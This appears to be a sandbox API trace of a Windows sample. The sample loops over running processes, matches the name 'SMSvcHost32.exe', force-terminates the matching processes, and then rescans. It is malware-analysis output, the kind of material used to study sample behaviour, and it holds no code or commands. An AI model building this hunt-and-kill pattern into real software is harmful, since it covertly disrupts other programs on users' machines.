	[0086.337] StrCmpIW (psz1="SMSvcHost32.exe", psz2="csrss.exe") returned 1
	[0086.337] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x184, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0086.338] StrCmpIW (psz1="SMSvcHost32.exe", psz2="winlogon.exe") returned -1
	[0086.338] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x18c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0086.339] StrCmpIW (psz1="SMSvcHost32.exe", psz2="services.exe") returned 1
	[0086.339] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x18c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0086.339] StrCmpIW (psz1="SMSvcHost32.exe", psz2="lsass.exe") returned 1
	[0086.339] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.340] StrCmpIW (psz1="SMSvcHost32.exe", psz2="svchost.exe") returned -1
	[0086.340] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.340] StrCmpIW (psz1="SMSvcHost32.exe", psz2="svchost.exe") returned -1
	[0086.341] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0086.341] StrCmpIW (psz1="SMSvcHost32.exe", psz2="dwm.exe") returned 1
	[0086.341] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.342] StrCmpIW (psz1="SMSvcHost32.exe", psz2="svchost.exe") returned -1
	[0086.342] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.342] StrCmpIW (psz1="SMSvcHost32.exe", psz2="svchost.exe") returned -1
	[0086.342] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.343] StrCmpIW (psz1="SMSvcHost32.exe", psz2="svchost.exe") returned -1
	[0086.343] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.344] StrCmpIW (psz1="SMSvcHost32.exe", psz2="svchost.exe") returned -1
	[0086.344] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5e, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.344] StrCmpIW (psz1="SMSvcHost32.exe", psz2="svchost.exe") returned -1
	[0086.344] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.345] StrCmpIW (psz1="SMSvcHost32.exe", psz2="svchost.exe") returned -1
	[0086.345] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.346] StrCmpIW (psz1="SMSvcHost32.exe", psz2="svchost.exe") returned -1
	[0086.346] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0086.346] StrCmpIW (psz1="SMSvcHost32.exe", psz2="spoolsv.exe") returned -1
	[0086.346] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1
	[0086.347] StrCmpIW (psz1="SMSvcHost32.exe", psz2="sihost.exe") returned 1
	[0086.347] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x600, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.347] StrCmpIW (psz1="SMSvcHost32.exe", psz2="svchost.exe") returned -1
	[0086.347] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x650, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1
	[0086.348] StrCmpIW (psz1="SMSvcHost32.exe", psz2="OfficeClickToRun.exe") returned 1
	[0086.348] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1
	[0086.349] StrCmpIW (psz1="SMSvcHost32.exe", psz2="RuntimeBroker.exe") returned 1
	[0086.349] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.349] StrCmpIW (psz1="SMSvcHost32.exe", psz2="svchost.exe") returned -1
	[0086.349] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1
	[0086.368] StrCmpIW (psz1="SMSvcHost32.exe", psz2="taskhostw.exe") returned -1
	[0086.368] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3a, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0086.368] StrCmpIW (psz1="SMSvcHost32.exe", psz2="explorer.exe") returned 1
	[0086.368] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1
	[0086.369] StrCmpIW (psz1="SMSvcHost32.exe", psz2="SkypeHost.exe") returned 1
	[0086.369] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1
	[0086.370] StrCmpIW (psz1="SMSvcHost32.exe", psz2="ShellExperienceHost.exe") returned 1
	[0086.370] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1
	[0086.370] StrCmpIW (psz1="SMSvcHost32.exe", psz2="SearchUI.exe") returned 1
	[0086.370] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0086.371] StrCmpIW (psz1="SMSvcHost32.exe", psz2="dllhost.exe") returned 1
	[0086.371] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0086.372] StrCmpIW (psz1="SMSvcHost32.exe", psz2="audiodg.exe") returned 1
	[0086.372] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1
	[0086.372] StrCmpIW (psz1="SMSvcHost32.exe", psz2="SkypeHost.exe") returned 1
	[0086.372] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.373] StrCmpIW (psz1="SMSvcHost32.exe", psz2="svchost.exe") returned -1
	[0086.373] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1
	[0086.373] StrCmpIW (psz1="SMSvcHost32.exe", psz2="backgroundTaskHost.exe") returned 1
	[0086.373] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1
	[0086.374] StrCmpIW (psz1="SMSvcHost32.exe", psz2="taskhostw.exe") returned -1
	[0086.374] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="develop-patent.exe")) returned 1
	[0086.375] StrCmpIW (psz1="SMSvcHost32.exe", psz2="develop-patent.exe") returned 1
	[0086.375] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xea4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="its.exe")) returned 1
	[0086.375] StrCmpIW (psz1="SMSvcHost32.exe", psz2="its.exe") returned 1
	[0086.375] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gently budapest.exe")) returned 1
	[0086.376] StrCmpIW (psz1="SMSvcHost32.exe", psz2="gently budapest.exe") returned 1
	[0086.376] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thoroughlypriestprefix.exe")) returned 1
	[0086.376] StrCmpIW (psz1="SMSvcHost32.exe", psz2="thoroughlypriestprefix.exe") returned -1
	[0086.376] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xee0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="inserted_field.exe")) returned 1
	[0086.377] StrCmpIW (psz1="SMSvcHost32.exe", psz2="inserted_field.exe") returned 1
	[0086.377] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="semi bay.exe")) returned 1
	[0086.377] StrCmpIW (psz1="SMSvcHost32.exe", psz2="semi bay.exe") returned 1
	[0086.377] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="outdoor.exe")) returned 1
	[0086.378] StrCmpIW (psz1="SMSvcHost32.exe", psz2="outdoor.exe") returned 1
	[0086.378] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wool-parish-horses.exe")) returned 1
	[0086.378] StrCmpIW (psz1="SMSvcHost32.exe", psz2="wool-parish-horses.exe") returned -1
	[0086.379] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoken-delayed.exe")) returned 1
	[0086.379] StrCmpIW (psz1="SMSvcHost32.exe", psz2="spoken-delayed.exe") returned -1
	[0086.379] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spokesman.exe")) returned 1
	[0086.380] StrCmpIW (psz1="SMSvcHost32.exe", psz2="spokesman.exe") returned -1
	[0086.380] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="oxide.exe")) returned 1
	[0086.380] StrCmpIW (psz1="SMSvcHost32.exe", psz2="oxide.exe") returned 1
	[0086.380] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="off-covered-playlist.exe")) returned 1
	[0086.381] StrCmpIW (psz1="SMSvcHost32.exe", psz2="off-covered-playlist.exe") returned 1
	[0086.381] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bryant.exe")) returned 1
	[0086.382] StrCmpIW (psz1="SMSvcHost32.exe", psz2="bryant.exe") returned 1
	[0086.382] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="postal-fool.exe")) returned 1
	[0086.382] StrCmpIW (psz1="SMSvcHost32.exe", psz2="postal-fool.exe") returned 1
	[0086.382] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="crm_remarks_ctrl.exe")) returned 1
	[0086.383] StrCmpIW (psz1="SMSvcHost32.exe", psz2="crm_remarks_ctrl.exe") returned 1
	[0086.383] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="volunteer.exe")) returned 1
	[0086.384] StrCmpIW (psz1="SMSvcHost32.exe", psz2="volunteer.exe") returned -1
	[0086.384] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ranger_tu_community.exe")) returned 1
	[0086.384] StrCmpIW (psz1="SMSvcHost32.exe", psz2="ranger_tu_community.exe") returned 1
	[0086.384] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eddie_cholesterol_reprint.exe")) returned 1
	[0086.385] StrCmpIW (psz1="SMSvcHost32.exe", psz2="eddie_cholesterol_reprint.exe") returned 1
	[0086.385] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bracket-natural-chancellor.exe")) returned 1
	[0086.386] StrCmpIW (psz1="SMSvcHost32.exe", psz2="bracket-natural-chancellor.exe") returned 1
	[0086.386] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="safari.exe")) returned 1
	[0086.386] StrCmpIW (psz1="SMSvcHost32.exe", psz2="safari.exe") returned 1
	[0086.386] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0086.387] StrCmpIW (psz1="SMSvcHost32.exe", psz2="WmiPrvSE.exe") returned -1
	[0086.387] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xff8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SMSvcHost32.exe")) returned 1
	[0086.388] StrCmpIW (psz1="SMSvcHost32.exe", psz2="SMSvcHost32.exe") returned 0
	[0086.388] OpenProcess (dwDesiredAccess=0x401, bInheritHandle=0, dwProcessId=0xdb0) returned 0x1f8
	[0086.388] GetExitCodeProcess (in: hProcess=0x1f8, lpExitCode=0x263ff6c | out: lpExitCode=0x263ff6c*=0x103) returned 1
	[0086.388] TerminateProcess (hProcess=0x1f8, uExitCode=0x0) returned 1
	[0086.400] CloseHandle (hObject=0x1f8) returned 1
	[0086.400] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0086.401] StrCmpIW (psz1="SMSvcHost32.exe", psz2="svchost.exe") returned -1
	[0086.401] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xdb0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SMSvcHost32.exe")) returned 1
	[0086.526] StrCmpIW (psz1="SMSvcHost32.exe", psz2="SMSvcHost32.exe") returned 0
	[0086.526] OpenProcess (dwDesiredAccess=0x401, bInheritHandle=0, dwProcessId=0xdb8) returned 0x1f8
	[0086.526] GetExitCodeProcess (in: hProcess=0x1f8, lpExitCode=0x263ff6c | out: lpExitCode=0x263ff6c*=0x103) returned 1
	[0086.526] TerminateProcess (hProcess=0x1f8, uExitCode=0x0) returned 1
	[0086.537] CloseHandle (hObject=0x1f8) returned 1
	[0086.537] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0086.538] StrCmpIW (psz1="SMSvcHost32.exe", psz2="sppsvc.exe") returned -1
	[0086.538] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xdb0, pcPriClassBase=8, dwFlags=0x0, szExeFile="tmp8C77.tmp")) returned 1
	[0086.538] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xdb0, pcPriClassBase=8, dwFlags=0x0, szExeFile="tmp8C77.tmp")) returned 0
	[0086.539] CloseHandle (hObject=0x1f4) returned 1
	[0086.539] Sleep (dwMilliseconds=0x32) 
	[0086.605] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f4
	[0086.609] Process32FirstW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0086.610] StrCmpIW (psz1="SMSvcHost32.exe", psz2="[System Process]") returned 1
	[0086.610] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0086.611] StrCmpIW (psz1="SMSvcHost32.exe", psz2="System") returned -1
	[0086.611] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0086.612] StrCmpIW (psz1="SMSvcHost32.exe", psz2="smss.exe") returned 1
	[0086.612] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0086.612] StrCmpIW (psz1="SMSvcHost32.exe", psz2="csrss.exe") returned 1
	[0086.612] Process32NextW (in: hSnapshot=0x1f4, lppe=0x263fc6c | out: lppe=0x263fc6c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0086.613] StrCmpIW (psz1="SMSvcHost32.exe", psz2="wininit.exe") returned -1
